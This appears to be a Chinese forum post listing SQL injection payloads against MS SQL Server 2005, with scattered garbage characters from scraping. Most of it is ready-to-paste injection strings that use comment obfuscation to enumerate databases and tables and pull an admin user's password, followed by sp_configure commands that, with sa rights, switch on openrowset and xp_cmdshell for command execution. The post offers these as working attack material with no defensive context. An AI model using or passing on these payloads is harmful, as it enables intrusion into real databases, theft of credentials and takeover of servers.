MSsql2005注入语句

admin

9 x# w1 T. E6 Z/ ^9 M( d7 X2 x
9 N1 n) X6 C* O5 n) Y/ C" u1 l[Copy to clipboard]CODE:
' J4 e8 j( v' i1 C/ n& j+ @; G! y/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

0 o3 |7 t- {4 Q4 C9 d8 ^爆表语句,somedb部份是所要列的数据库，红色数字1累加
% K# M4 _( y9 O# i& x: P. c

/ B; L; z6 h" D* `; }) ?[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

9 {2 P0 j4 ~# L- `8 P1 ]. B% r爆字段语句，爆表admin里user='icerover'的密码段

4 J  q0 M0 U1 P2 t2 Z
3 {/ C! A( A) v/ ^- C- C* B( l( T[Copy to clipboard]CODE:
" P& w: G( O# M0 B**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

mssql2005默认没有开xp_cmdshell的，openrowset也不能用
+ }' O6 G0 L  [$ y/ Q如果是sa权限，可以这样来开启
. o, y5 o7 R& k# @开启openrowset

$ ^+ u* Z* y# ?: W) F( f% v
[Copy to clipboard]CODE:
3 @9 I* p! F% K1 S( t6 g1 I/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

: {* G- T1 R) I* e  q/ q4 F开启xp_cmdshell
7 V2 n: ~# V5 Y; A7 S
) ~' A5 T& z+ e. E- s5 H  A
[Copy to clipboard]CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
; \5 m4 m6 z0 X6 k& Q: wEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

. W6 j5 c9 z5 z1 G' P% Zok,over~~晚安